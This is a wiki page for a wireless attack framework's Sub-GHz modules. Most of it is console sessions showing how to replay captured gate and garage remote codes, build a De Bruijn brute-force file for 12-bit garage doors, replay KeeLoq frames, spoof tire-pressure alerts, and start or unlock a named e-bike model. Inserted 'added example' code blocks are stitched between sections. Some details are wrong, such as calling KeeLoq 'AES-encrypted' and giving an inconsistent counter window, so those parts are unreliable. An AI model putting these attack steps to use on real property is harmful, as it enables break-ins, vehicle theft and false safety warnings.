SubGHz Attacks

André Henrique edited this page Jun 8, 2026 · 1 revision

Sub-GHz Attack Suite (300-928 MHz)

Legal Warning: Transmitting on Sub-GHz bands without a license is illegal in most jurisdictions. Use only on your own equipment, inside RF-shielded enclosures, or in authorized red team engagements. Garage and gate spoofing without explicit property owner consent is a criminal offense.


Prerequisites

| Component | Purpose | Required For |
|---|---|---|
| HackRF One | TX+RX 1 MHz-6 GHz | Replay, bruteforce, jamming |
| RTL-SDR | RX only (passive) | TPMS decode, signal analysis |
| CC1101 + ESP32 | TX+RX 300-928 MHz (budget) | Static code attacks |
| Flipper Zero / Bruce | Sub-GHz TX+RX | .sub file replay |

Supported Protocols

| Protocol | Bits | Frequency | Security | Module |
|---|---|---|---|---|
| EV1527 | 24 | 433 MHz | None | subghz/static_code_replay |
| Princeton / PT2262 | 24 | 315/433 MHz | None | subghz/static_code_replay |
| CAME | 12 | 303-868 MHz | None | subghz/debruijn_bruteforce |
| NICE Flo | 12 | 433/868 MHz | None | subghz/debruijn_bruteforce |
| Holtek HT12X | 12 | 315/433/868/915 MHz | None | subghz/debruijn_bruteforce |
| Chamberlain | 9 | 300/315/390 MHz | None | subghz/debruijn_bruteforce |
| KeeLoq | 64 | 433/868 MHz | AES rolling code | subghz/keeloq_* |
| TPMS Toyota | var | 315 MHz | CRC only | subghz/tpms/tpms_decoder |
| TPMS Renault | var | 433 MHz | CRC only | subghz/tpms/tpms_decoder |
| EV1527 vehicle | 24 | 433 MHz | None | subghz/ev1527_vehicle_cve_2025_70994 |

Module Reference

| Module | Description |
|---|---|
| static_code_replay | EV1527/Princeton/CAME/NICE/Holtek/Chamberlain static code replay |
| debruijn_bruteforce | DeBruijn sequence bruteforce for 12-bit garage door protocols |
| keeloq_decoder | KeeLoq rolling code frame decoder and analyzer |
| keeloq_replay | KeeLoq rolling code replay within counter window |
| ev1527_vehicle_cve_2025_70994 | CVE-2025-70994 - EV1527 vehicle remote keyless entry replay |
| subghz_jammer | Sub-GHz selective jammer (authorized testing only) |
| br_gate_scanner | Brazilian gate/garage protocol scanner and recorder |
| tpms/tpms_decoder | TPMS tire pressure sensor passive decoder (RTL-SDR) |
| tpms/tpms_spoof | TPMS spoofed tire pressure alert injection |
| tools/ook_analyzer | OOK signal analyzer: preamble, bit timing, protocol identification |

Static Code Replay

For protocols with no rolling code protection (EV1527, Princeton, etc.), a captured signal can be replayed indefinitely.

wxf > use generic/subghz/static_code_replay
wxf (StaticCodeReplay) > show options

Options:
  PROTOCOL   EV1527      Protocol (EV1527, Princeton, CAME, NICE, Holtek, Chamberlain)
  CODE       0x000000    24-bit code to transmit (0x = hex, decimal accepted)
  FREQUENCY  433.92      Frequency in MHz
  INTERFACE  hackrf      Hardware interface (hackrf, cc1101, simulate)
  REPEATS    3           Number of transmissions
  SIMULATE   true        Simulate without transmitting

wxf (StaticCodeReplay) > set PROTOCOL EV1527
wxf (StaticCodeReplay) > set CODE 0xA3F21B
wxf (StaticCodeReplay) > set FREQUENCY 433.92
wxf (StaticCodeReplay) > set SIMULATE true
wxf (StaticCodeReplay) > run

[SIMULATE] EV1527 code: 0xA3F21B (10739227)
[SIMULATE] Frequency: 433.92 MHz | Bit time: 333 us
[SIMULATE] Preamble: 32 periods LOW | Data: 24 bits (Manchester-like)
[SIMULATE] OOK pulse sequence (24 bits):
[SIMULATE]   101000001010000010100010 (hex: A3F21B)
[SIMULATE] Would transmit 3x via HackRF One at 433.92 MHz
[!] Set SIMULATE=false and INTERFACE=hackrf to transmit live
[!] PREREQ: hackrf_transfer installed + HackRF One connected

To capture a signal first using RTL-SDR and then decode it:

wxf > use generic/subghz/tools/ook_analyzer
wxf (OOKAnalyzer) > set INTERFACE rtlsdr
wxf (OOKAnalyzer) > set FREQUENCY 433.92
wxf (OOKAnalyzer) > run

[*] Listening on 433.92 MHz via RTL-SDR...
[*] Signal detected! OOK burst captured.
[+] Protocol guess: EV1527 (24-bit, 333 us/bit)
[+] Preamble: 32x LOW detected
[+] Decoded bits: 101000001010000010100010
[+] Hex code: 0xA3F21B
[+] Saved: /tmp/ook_capture_433920000.sub

DeBruijn Bruteforce (Garage Doors)

For 12-bit fixed-code protocols (CAME, NICE, Holtek), a DeBruijn sequence tests all 4096 possible codes efficiently. The sequence is constructed so that every possible 12-bit code appears exactly once as a sliding window over one continuous bit stream, which keeps the total transmission time to a minimum.

wxf > use generic/subghz/debruijn_bruteforce
wxf (DeBruijn) > show options

Options:
  PROTOCOL    CAME        Protocol (CAME, NICE, Holtek, Chamberlain)
  FREQUENCY   433.92      Frequency in MHz
  OUTPUT_SUB  /tmp/out.sub  Output .sub file path (Flipper/Bruce compatible)
  SIMULATE    true        Preview without generating file

wxf (DeBruijn) > set PROTOCOL CAME
wxf (DeBruijn) > set FREQUENCY 433.92
wxf (DeBruijn) > set OUTPUT_SUB /tmp/came_brute.sub
wxf (DeBruijn) > run

[*] Generating DeBruijn sequence for CAME 12-bit at 433.92 MHz
[*] Protocol timing: TE=320us | Footer: -11520us
[*] Total unique codes: 4,096
[*] Estimated TX time at 320us/bit x 12 bits x 3 repeats: ~4.8 minutes
[+] Generated: /tmp/came_brute.sub (Flipper Zero / Bruce compatible)
[*] File contains 4,096 RAW_Data entries

[*] To use on Flipper Zero:
    Sub-GHz -> Saved -> came_brute.sub -> Send
[*] To use on Bruce firmware (M5Stack/Lilygo):
    RF -> Custom SubGhz -> Load File

[*] Supported protocols and estimated times:
    CAME 303/307/315/330/433/868 MHz  - ~4.8 min
    NICE 433/868 MHz                  - ~10.5 min
    Holtek 315/433/868/915 MHz        - ~6.5 min
    Chamberlain 300/315/390 MHz       - ~2.1 min
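The following is an added example, not WXF code, showing the coverage property the paragraph above relies on. It builds B(2, n) with the standard FKM (Fredricksen-Kessler-Maiorana) construction and checks that one linear stream of 2^n + n - 1 bits contains every n-bit code as a window, then compares that with sending each code as its own n-bit frame. It generalises to any code width (Chamberlain's 9 bits as well as the 12-bit protocols). How a particular receiver frames codes (sync gaps, required repeats) is not modelled, and the per-bit duration passed to airtime_seconds is an assumed value.

```python
"""De Bruijn coverage check for n-bit fixed-code receivers (added example, not WXF code)."""
from typing import Dict, Set


def de_bruijn(n: int, k: int = 2) -> str:
    """Cyclic de Bruijn sequence B(k, n) as a digit string of length k**n (FKM construction)."""
    a = [0] * (k * n)
    out = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(map(str, out))


def linear_stream(n: int) -> str:
    """Cyclic sequence plus its first n-1 bits, so a receiver reading linearly sees every window."""
    s = de_bruijn(n)
    return s + s[:n - 1]


def windows(stream: str, n: int) -> Set[str]:
    """Every n-bit window a shift-register style receiver would observe while the stream plays."""
    return {stream[i:i + n] for i in range(len(stream) - n + 1)}


def coverage_report(n: int) -> Dict:
    """Compare the de Bruijn stream against sending every code separately, one frame each."""
    stream = linear_stream(n)
    seen = windows(stream, n)
    codes = 2 ** n
    return {
        "bits": n,
        "codes": codes,
        "all_codes_covered": len(seen) == codes,
        "stream_bits": len(stream),        # 2^n + n - 1
        "naive_bits": codes * n,           # n bits per code, every code sent on its own
        "reduction": round(codes * n / len(stream), 1),
    }


def airtime_seconds(n: int, bit_us: float) -> float:
    """Worst-case time to play the whole stream once at bit_us per bit (bit_us is an assumed value)."""
    return len(linear_stream(n)) * bit_us / 1e6


if __name__ == "__main__":
    for width in (9, 12):
        print(coverage_report(width))
```

The report makes the defensive point concrete: a 12-bit fixed code is exhausted by a stream of 4,107 bits rather than 49,152, and the only structural fix is a keyed rolling counter, since widening a static code merely lengthens the stream.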

KeeLoq Rolling Code Analysis

KeeLoq is a 64-bit rolling code system used by many automotive and garage door manufacturers. The 64-bit frame is divided into a FIX portion (static serial number and button code) and a HOP portion (AES-encrypted counter). Replay attacks succeed only within the counter acceptance window (typically +/-256 from the last accepted code).

Step 1: Decode a captured KeeLoq frame

wxf > use generic/subghz/keeloq_decoder
wxf (KeeLoqDecoder) > set CAPTURE_FILE /tmp/captured_signal.sub
wxf (KeeLoqDecoder) > run

[*] Analyzing: /tmp/captured_signal.sub
[+] Protocol: KeeLoq (64-bit rolling code)
[+] FIX portion (static):
    Serial number:  0xA1B2C3D4
    Button code:    0x3 (button 3 / unlock)
    Status bits:    0b0001
[+] HOP portion (encrypted): 0xE5F60789
[!] Decryption requires manufacturer key
[*] Estimated manufacturer: CAME Space (based on FIX structure)
[*] Counter window: typical +/-256 from last accepted code

Step 2: Replay within counter window

wxf > use generic/subghz/keeloq_replay
wxf (KeeLoqReplay) > set CAPTURE_FILE /tmp/captured_signal.sub
wxf (KeeLoqReplay) > set SIMULATE true
wxf (KeeLoqReplay) > run

[SIMULATE] Would retransmit captured KeeLoq frame
[SIMULATE] FIX: 0xA1B2C3D4 | HOP: 0xE5F60789 | Counter: ~EC04
[SIMULATE] Window: EC04 to EC103 (+/-256)
[!] Replay succeeds only if counter is within window
[!] Set SIMULATE=false + INTERFACE=hackrf to transmit
[!] PREREQ: HackRF One + 433 MHz antenna + hackrf_transfer
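The following added example (not WXF or any manufacturer's code) models the receiver side of the counter window described above, to show why a captured frame is only useful inside that window and becomes dead once the owner presses the remote again. The HOP portion is encrypted with the published KeeLoq block cipher (32-bit block, 64-bit key, 528 NLFSR rounds) so the model receiver can recover the counter; the window size is the 256 quoted above, applied in the forward direction only, because a rolling-code receiver never accepts a counter at or behind the last one it used. The key, serial number and counter values are constructed, and pairing is modelled by letting the first valid frame set the counter.

```python
"""Rolling-code receiver acceptance model for KeeLoq-style frames (added example, not WXF code)."""
from typing import List, Tuple

KEELOQ_NLF = 0x3A5C742E   # 5-input non-linear function of the KeeLoq cipher, bit-indexed


def _bit(x: int, n: int) -> int:
    return (x >> n) & 1


def keeloq_encrypt(block: int, key: int) -> int:
    """KeeLoq block cipher, encryption direction (528 rounds)."""
    x = block & 0xFFFFFFFF
    for r in range(528):
        sel = _bit(x, 1) | (_bit(x, 9) << 1) | (_bit(x, 20) << 2) | (_bit(x, 26) << 3) | (_bit(x, 31) << 4)
        fb = _bit(KEELOQ_NLF, sel) ^ _bit(x, 16) ^ _bit(x, 0) ^ _bit(key, r % 64)
        x = (x >> 1) | (fb << 31)
    return x


def keeloq_decrypt(block: int, key: int) -> int:
    """KeeLoq block cipher, decryption direction (inverse of keeloq_encrypt)."""
    x = block & 0xFFFFFFFF
    for r in range(528):
        sel = _bit(x, 0) | (_bit(x, 8) << 1) | (_bit(x, 19) << 2) | (_bit(x, 25) << 3) | (_bit(x, 30) << 4)
        fb = _bit(KEELOQ_NLF, sel) ^ _bit(x, 31) ^ _bit(x, 15) ^ _bit(key, (15 - r) % 64)
        x = ((x << 1) & 0xFFFFFFFF) | fb
    return x


def make_frame(key: int, serial: int, button: int, counter: int) -> Tuple[int, int]:
    """What a paired transmitter sends for one press: (FIX, HOP).
    FIX = 28-bit serial + 4-bit button, sent in clear.
    HOP = encrypt(button | 2 overflow bits | 10-bit discrimination | 16-bit counter)."""
    disc = serial & 0x3FF
    plain = (button << 28) | (disc << 16) | (counter & 0xFFFF)
    fix = ((serial & 0xFFFFFFF) << 4) | (button & 0xF)
    return fix, keeloq_encrypt(plain, key)


class Receiver:
    def __init__(self, key: int, serial: int, window: int = 256):
        self.key, self.serial, self.window = key, serial, window
        self.last_counter = None   # set by the first valid frame (stands in for pairing)

    def receive(self, frame: Tuple[int, int]) -> Tuple[bool, str]:
        fix, hop = frame
        if fix >> 4 != self.serial:
            return False, "unknown serial"
        plain = keeloq_decrypt(hop, self.key)
        button, counter = fix & 0xF, plain & 0xFFFF
        # button + overflow + discrimination must match, otherwise the HOP was not made with our key
        if plain >> 16 != (button << 12) | (self.serial & 0x3FF):
            return False, "HOP does not decrypt to this serial (wrong key or forged)"
        if self.last_counter is None:
            self.last_counter = counter
            return True, f"paired at counter {counter:#06x}"
        ahead = (counter - self.last_counter) & 0xFFFF   # 16-bit wrap-around
        if ahead == 0:
            return False, f"replay: counter {counter:#06x} already used"
        if ahead > self.window:
            return False, f"counter {counter:#06x} is +{ahead} ahead, outside window"
        self.last_counter = counter
        return True, f"accepted counter {counter:#06x} (+{ahead})"


def demo() -> List[Tuple[bool, str]]:
    key, serial = 0x0123456789ABCDEF, 0x0A1B2C3      # constructed values

    def press(counter: int) -> Tuple[int, int]:
        return make_frame(key, serial, 0x3, counter)

    rx = Receiver(key, serial, window=256)
    captured = press(0xEC05)
    return [
        rx.receive(press(0xEC04)),   # first frame: receiver learns the counter
        rx.receive(captured),        # owner's next press, +1: accepted
        rx.receive(captured),        # same frame again: rejected, counter already used
        rx.receive(press(0xEC04)),   # older frame: wraps to +65535, outside window
        rx.receive(press(0xEC60)),   # some presses missed but still inside +256: accepted
        rx.receive(press(0xED70)),   # +272, beyond the window: rejected (needs resync)
        rx.receive(make_frame(0xDEADBEEFCAFEF00D, serial, 0x3, 0xEC61)),   # wrong key
    ]


if __name__ == "__main__":
    for ok, why in demo():
        print("ACCEPT" if ok else "REJECT", why)
```

The third and fourth decisions are the ones that matter for the replay module: a frame is only replayable while the receiver's counter is still behind it, so the detection opportunity on the receiver side is a burst of frames with counters at or below the last accepted value.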

TPMS Tire Pressure Spoofing

TPMS (Tire Pressure Monitoring System) sensors broadcast pressure, temperature, and battery data on 315/433 MHz using FSK or OOK modulation. Most sensors protect frames with a CRC only, which detects transmission errors but provides no authentication. A passive RTL-SDR can decode broadcasts; a HackRF can inject spoofed alerts.

Passive decode (RTL-SDR)

wxf > use generic/subghz/tpms/tpms_decoder
wxf (TPMSDecoder) > set INTERFACE rtlsdr
wxf (TPMSDecoder) > set FREQUENCY 433.92
wxf (TPMSDecoder) > run

[*] Passive TPMS scan on 433.92 MHz (RTL-SDR)
[*] Waiting for sensor broadcasts...
[+] Sensor detected: ID=0xABCDE123 | Pressure=2.3 bar | Temp=22C | Battery=OK
[+] Sensor detected: ID=0xABCDE124 | Pressure=2.4 bar | Temp=22C | Battery=OK
[+] Sensor detected: ID=0xABCDE125 | Pressure=2.3 bar | Temp=21C | Battery=OK
[+] Sensor detected: ID=0xABCDE126 | Pressure=2.4 bar | Temp=21C | Battery=OK
^C
[*] Scan stopped. 4 sensors logged (likely 4-wheel vehicle).
[+] Saved to /tmp/tpms_scan_20260608.json

Pressure spoofing (HackRF)

wxf > use generic/subghz/tpms/tpms_spoof
wxf (TPMSSpoof) > set TARGET_ID 0xABCDE123
wxf (TPMSSpoof) > set PRESSURE 0.5
wxf (TPMSSpoof) > set SIMULATE true
wxf (TPMSSpoof) > run

[SIMULATE] TPMS frame for sensor ID 0xABCDE123
[SIMULATE] Spoofed pressure: 0.5 bar (triggers LOW TIRE WARNING on dash)
[SIMULATE] Frequency: 433.92 MHz | Encoding: FSK diff Manchester
[SIMULATE] CRC: recalculated for spoofed payload
[SIMULATE] Would transmit continuously until Ctrl+C
[!] Set SIMULATE=false + INTERFACE=hackrf to inject
[!] PREREQ: HackRF One + 433 MHz antenna
[!] NOTE: Vehicle must be within ~10m for reliable injection
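The following added example (not WXF code) shows why "CRC: recalculated for spoofed payload" works and what would stop it. The frame layout is constructed for illustration and is not any vendor's format: 4-byte sensor ID, pressure in 0.1 bar, temperature in degC + 40, one flag byte, CRC-8 (polynomial 0x07). An altered payload with a recomputed CRC passes the receiver's check unchanged; the authenticated variant appends a truncated HMAC-SHA256 over the same bytes with a per-sensor key, which deployed sensors generally lack. A small receiver-side heuristic closes the example: a pressure drop larger than a threshold between two broadcasts of the same ID is flagged for a second look.

```python
"""CRC is integrity, not authentication: constructed TPMS-like frames (added example, not WXF code)."""
import hashlib
import hmac
from typing import Dict, List, Tuple

TAG_LEN = 4   # bytes of HMAC-SHA256 kept in the authenticated variant


def crc8(data: bytes, poly: int = 0x07) -> int:
    """Plain CRC-8, init 0, no reflection (a linear check anyone can recompute)."""
    crc = 0
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = ((crc << 1) ^ poly) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc


def build_frame(sensor_id: int, pressure_bar: float, temp_c: int, flags: int = 0) -> bytes:
    body = sensor_id.to_bytes(4, "big") + bytes([round(pressure_bar * 10), temp_c + 40, flags])
    return body + bytes([crc8(body)])


def parse_frame(frame: bytes) -> Dict:
    body, crc = frame[:-1], frame[-1]
    return {"id": int.from_bytes(body[:4], "big"), "pressure_bar": body[4] / 10,
            "temp_c": body[5] - 40, "flags": body[6], "crc_ok": crc8(body) == crc}


def alter_pressure(frame: bytes, new_pressure_bar: float) -> bytes:
    """Change the payload and recompute the CRC: a CRC-only receiver cannot tell the difference."""
    body = bytearray(frame[:-1])
    body[4] = round(new_pressure_bar * 10)
    return bytes(body) + bytes([crc8(bytes(body))])


def build_auth_frame(sensor_id: int, pressure_bar: float, temp_c: int, key: bytes, flags: int = 0) -> bytes:
    """Same frame plus a keyed tag; only a party holding the per-sensor key can produce it."""
    frame = build_frame(sensor_id, pressure_bar, temp_c, flags)
    return frame + hmac.new(key, frame, hashlib.sha256).digest()[:TAG_LEN]


def verify_auth_frame(auth_frame: bytes, key: bytes) -> bool:
    frame, tag = auth_frame[:-TAG_LEN], auth_frame[-TAG_LEN:]
    expected = hmac.new(key, frame, hashlib.sha256).digest()[:TAG_LEN]
    return hmac.compare_digest(tag, expected) and parse_frame(frame)["crc_ok"]


def alter_auth_frame(auth_frame: bytes, new_pressure_bar: float) -> bytes:
    """Without the key the best an attacker can do is keep the old tag, which no longer matches."""
    frame = alter_pressure(auth_frame[:-TAG_LEN], new_pressure_bar)
    return frame + auth_frame[-TAG_LEN:]


def spoof_indicators(readings: List[Dict], max_drop_bar: float = 1.0) -> List[Tuple[int, float, float]]:
    """Heuristic only: flag a drop larger than max_drop_bar between consecutive broadcasts of one ID."""
    last: Dict[int, float] = {}
    alerts = []
    for r in readings:
        prev = last.get(r["id"])
        if prev is not None and prev - r["pressure_bar"] > max_drop_bar:
            alerts.append((r["id"], prev, r["pressure_bar"]))
        last[r["id"]] = r["pressure_bar"]
    return alerts


if __name__ == "__main__":
    genuine = build_frame(0xABCDE123, 2.3, 22)            # constructed sensor reading
    forged = alter_pressure(genuine, 0.5)
    print("forged CRC ok:", parse_frame(forged)["crc_ok"])
    key = b"constructed-per-sensor-key"
    authed = build_auth_frame(0xABCDE123, 2.3, 22, key)
    print("forged tag ok:", verify_auth_frame(alter_auth_frame(authed, 0.5), key))
    print("alerts:", spoof_indicators([parse_frame(genuine), parse_frame(forged)]))
```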

CVE-2025-70994 - Electric Bicycle Keyless Entry Bypass

This CVE affects the Yadea T5 electric bicycle (2024+) and similar vehicles using static EV1527-based remote keyless entry. The vehicle uses a static 20-bit address in the EV1527 protocol. Any captured signal (including a bell ring) exposes the vehicle ID, allowing synthesis of a Start command.

wxf > use generic/subghz/ev1527_vehicle_cve_2025_70994
wxf (EV1527Vehicle) > show info

  Name:     EV1527 Vehicle Keyless Entry Bypass
  CVE:      CVE-2025-70994
  CVSS:     7.3 (High)
  Target:   Yadea T5 Electric Bicycle (2024+), similar EV1527-based vehicles
  Auth:     None required
  Status:   Coordinated disclosure - CISA/CERT/CC - April 2026

  Description:
    The Yadea T5 uses a static 20-bit vehicle address in EV1527 protocol.
    Any captured signal (including bell ring) exposes the vehicle ID.
    Attacker synthesizes Start command: vehicle_id + 0x2 (start byte).

wxf (EV1527Vehicle) > set TARGET_ID 0xABCDE
wxf (EV1527Vehicle) > set COMMAND start
wxf (EV1527Vehicle) > set SIMULATE true
wxf (EV1527Vehicle) > run

[*] CVE-2025-70994: EV1527 Vehicle Start Spoof
[*] Vehicle ID (20 bits): 0xABCDE
[*] Command code:          0x2 (Start/Ignition)
[*] Full 24-bit frame:     0xABCDE2

[SIMULATE] OOK frame to transmit:
[SIMULATE]   Preamble: LOW 31x TE (333us each) = 10.3ms
[SIMULATE]   Data (24 bits): 10101011 11001101 11100010
[SIMULATE]   Carrier: 433.92 MHz ASK/OOK
[SIMULATE]   Repeats: 3x (standard EV1527 retransmit)

[!] Set SIMULATE=false to transmit (requires HackRF or CC1101)
[!] Affected: All Yadea T5 (2024+) with firmware < patch
[*] Disclosure: Coordinated with CISA and CERT/CC, April 2026

Supported commands for set COMMAND:

| Command | Code | Effect |
|---|---|---|
| start | 0x2 | Start ignition / motor enable |
| stop | 0x1 | Stop motor |
| lock | 0x3 | Lock vehicle |
| unlock | 0x4 | Unlock vehicle |
| alarm | 0x5 | Trigger alarm / horn |

Brazilian Gate Scanner

The br_gate_scanner module passively records garage door and gate signals for common protocols used in Brazil (PECCININ, RCG, Garen, JFL, AGL), outputting Flipper Zero .sub files.

wxf > use generic/subghz/br_gate_scanner
wxf (BRGateScanner) > set INTERFACE rtlsdr
wxf (BRGateScanner) > set SCAN_BANDS all
wxf (BRGateScanner) > set DURATION 60
wxf (BRGateScanner) > run

[*] Scanning Brazilian gate/garage protocols for 60s
[*] Bands: 433.92, 868.30, 315.00 MHz
[*] Listening...
[+] Signal at 433.92 MHz: EV1527-like (24-bit), code=0xF1E2D3
    Brand guess: PECCININ PPA (EV1527 compatible)
    Saved: /tmp/signal_433920000_F1E2D3.sub
[+] Signal at 433.92 MHz: NICE Flo (12-bit), code=0xA3B
    Saved: /tmp/signal_nice_A3B.sub
[*] Scan complete. 2 signals captured.

OOK Signal Analyzer

wxf > use generic/subghz/tools/ook_analyzer
wxf (OOKAnalyzer) > set CAPTURE_FILE /tmp/mystery_signal.sub
wxf (OOKAnalyzer) > run

[*] Analyzing: /tmp/mystery_signal.sub
[+] Modulation: OOK (On-Off Keying)
[+] Carrier: 433.92 MHz
[+] Bit time (TE): 330-336 us -> 333 us nominal
[+] Preamble: 32 periods LOW (10.6ms)
[+] Data length: 24 bits
[+] Bit encoding: width modulation (short=0, long=1)
[+] Protocol match: EV1527 (confidence: 95%)
[+] Decoded code: 0xA3F21B
[+] Repeat count: 3
[+] Gap between repeats: 10ms

[*] Compatible modules:
    use generic/subghz/static_code_replay
    set CODE 0xA3F21B
    set FREQUENCY 433.92
    set PROTOCOL EV1527
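The following is an added example, not WXF code, for this analyzer section and for the Static Code Replay section above. It implements the width-modulation decode the analyzer reports ("short=0, long=1" with a long LOW preamble) so that a pulse capture can be checked by hand: the pulse format follows the EV1527 datasheet convention (each bit is a HIGH pulse then a LOW gap, '0' = 1 TE high / 3 TE low, '1' = 3 TE high / 1 TE low, sync word 1 TE high / 31 TE low), TE is estimated from the capture itself, and the bit string, hex value, bit count and repeat count are derived from the pulses rather than typed in. The 333 us TE, the 25 % tolerance and the jitter used to build the sample capture are assumed values.

```python
"""Width-modulated OOK pulse encoder/decoder, EV1527-style framing (added example, not WXF code)."""
import random
from typing import Dict, List, Optional, Tuple

Pulse = Tuple[int, int]      # (high_us, low_us)

TE_US = 333                  # nominal time element for EV1527 (assumed, matches the analyzer report)
TOLERANCE = 0.25             # accept +/-25 % timing jitter when classifying a pulse (assumed)


def encode(code: int, nbits: int = 24, te_us: int = TE_US, repeats: int = 1) -> List[Pulse]:
    """Sync word followed by nbits width-modulated bits, MSB first, repeated `repeats` times."""
    frame: List[Pulse] = [(te_us, 31 * te_us)]
    for bit in format(code, f"0{nbits}b"):
        frame.append((3 * te_us, te_us) if bit == "1" else (te_us, 3 * te_us))
    return frame * repeats


def add_jitter(pulses: List[Pulse], pct: float = 0.08, seed: int = 7) -> List[Pulse]:
    """Constructed receiver noise: stretch or shrink every element by up to +/-pct."""
    rnd = random.Random(seed)
    return [(int(h * (1 + rnd.uniform(-pct, pct))), int(l * (1 + rnd.uniform(-pct, pct))))
            for h, l in pulses]


def _about(value: int, target: float) -> bool:
    return abs(value - target) <= TOLERANCE * target


def estimate_te(pulses: List[Pulse]) -> int:
    """TE is the shortest element on air; the median of all 'short' elements resists outliers."""
    durations = sorted(d for pair in pulses for d in pair)
    shortest = durations[0]
    short = [d for d in durations if d <= shortest * (1 + 2 * TOLERANCE)]
    return short[len(short) // 2]


def _summarise(bitstring: str, te: int) -> Dict:
    nbits = len(bitstring)
    value = int(bitstring, 2)
    guess = {24: "EV1527 / Princeton (24-bit)", 12: "CAME / NICE / Holtek (12-bit)"}.get(nbits, "unknown")
    return {"te_us": te, "nbits": nbits, "bits": bitstring,
            "hex": f"0x{value:0{(nbits + 3) // 4}X}", "protocol_guess": guess}


def decode_all(pulses: List[Pulse]) -> List[Dict]:
    """Split a pulse train at sync words and decode every frame found."""
    te = estimate_te(pulses)
    frames: List[Dict] = []
    i, n = 0, len(pulses)
    while i < n:
        hi, lo = pulses[i]
        i += 1
        if not (_about(hi, te) and _about(lo, 31 * te)):
            continue                       # not a sync word: skip as noise
        bits = []
        while i < n:
            hi, lo = pulses[i]
            if _about(hi, te) and _about(lo, 3 * te):
                bits.append("0")
            elif _about(hi, 3 * te) and _about(lo, te):
                bits.append("1")
            else:
                break                      # next sync word (or noise) ends this frame
            i += 1
        if bits:
            frames.append(_summarise("".join(bits), te))
    return frames


def analyse(pulses: List[Pulse]) -> Optional[Dict]:
    """Analyzer-style report: first decoded frame plus how many identical repeats the capture holds."""
    frames = decode_all(pulses)
    if not frames:
        return None
    report = dict(frames[0])
    report["repeats"] = sum(1 for f in frames if f["hex"] == frames[0]["hex"])
    return report


if __name__ == "__main__":
    capture = add_jitter(encode(0xA3F21B, repeats=3))   # constructed capture: 3 repeats with jitter
    print(analyse(capture))
```

Running the block on the constructed capture recovers 0xA3F21B with 3 repeats; feeding it a 12-bit code changes the protocol guess, which is the same bit-count heuristic the analyzer output above relies on.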

Hardware Setup Notes

HackRF One

# Install
sudo apt install hackrf

# Test connection
hackrf_info
# HackRF One found (firmware: 2023.01.1)

# Required for TX modules
export HACKRF_INSTALLED=1

RTL-SDR

# Install
sudo apt install rtl-sdr python3-rtlsdr

# Test
rtl_test -t
# Found 1 device(s): Generic RTL2832U OEM

# Required for passive RX modules (TPMS, OOK analyzer)

CC1101 + ESP32

Connect CC1101 to ESP32 via SPI. Flash with custom WXF firmware or use generic/subghz/static_code_replay with INTERFACE=cc1101. See docs for wiring.


Related pages: Drone Security | Maritime Security | WIDS


Author: Andre Henrique (@mrhenrike) | Uniao Geek

WirelessXPL-Forge v1.8.0
